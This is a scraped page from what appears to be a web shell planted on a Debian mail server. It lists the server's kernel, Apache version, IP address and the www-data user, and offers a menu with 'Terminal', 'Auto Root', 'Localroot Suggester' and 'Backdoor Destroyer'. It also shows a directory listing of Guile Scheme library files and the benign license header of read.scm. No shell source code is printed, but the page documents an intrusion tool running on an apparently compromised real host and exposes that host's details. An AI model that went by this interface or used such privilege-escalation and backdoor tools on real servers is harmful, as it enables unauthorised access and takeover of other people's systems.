Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
guile /
3.0 /
scheme /
Delete
Unzip
Name
Size
Permission
Date
Action
base.scm
17.46
KB
-rw-r--r--
2022-02-10 20:40
case-lambda.scm
840
B
-rw-r--r--
2022-02-10 20:40
char.scm
3.4
KB
-rw-r--r--
2022-02-10 20:40
complex.scm
933
B
-rw-r--r--
2022-02-10 20:40
cxr.scm
1.29
KB
-rw-r--r--
2022-02-10 20:40
eval.scm
1.39
KB
-rw-r--r--
2022-02-10 20:40
file.scm
1.1
KB
-rw-r--r--
2022-02-10 20:40
inexact.scm
2.14
KB
-rw-r--r--
2022-02-10 20:40
lazy.scm
976
B
-rw-r--r--
2022-02-10 20:40
load.scm
979
B
-rw-r--r--
2022-02-10 20:40
process-context.scm
1.97
KB
-rw-r--r--
2022-02-10 20:40
r5rs.scm
4.29
KB
-rw-r--r--
2022-02-10 20:40
read.scm
826
B
-rw-r--r--
2022-02-10 20:40
repl.scm
845
B
-rw-r--r--
2022-02-10 20:40
time.scm
1.11
KB
-rw-r--r--
2022-02-10 20:40
write.scm
979
B
-rw-r--r--
2022-02-10 20:40
Save
Rename
;;; R7RS compatibility libraries ;;; Copyright (C) 2019 Free Software Foundation, Inc. ;;; ;;; This library is free software: you can redistribute it and/or modify ;;; it under the terms of the GNU Lesser General Public License as ;;; published by the Free Software Foundation, either version 3 of the ;;; License, or (at your option) any later version. ;;; ;;; This library is distributed in the hope that it will be useful, but ;;; WITHOUT ANY WARRANTY; without even the implied warranty of ;;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ;;; Lesser General Public License for more details. ;;; ;;; You should have received a copy of the GNU Lesser General Public ;;; License along with this program. If not, see ;;; <http://www.gnu.org/licenses/>. (define-module (scheme read) #:re-export (read))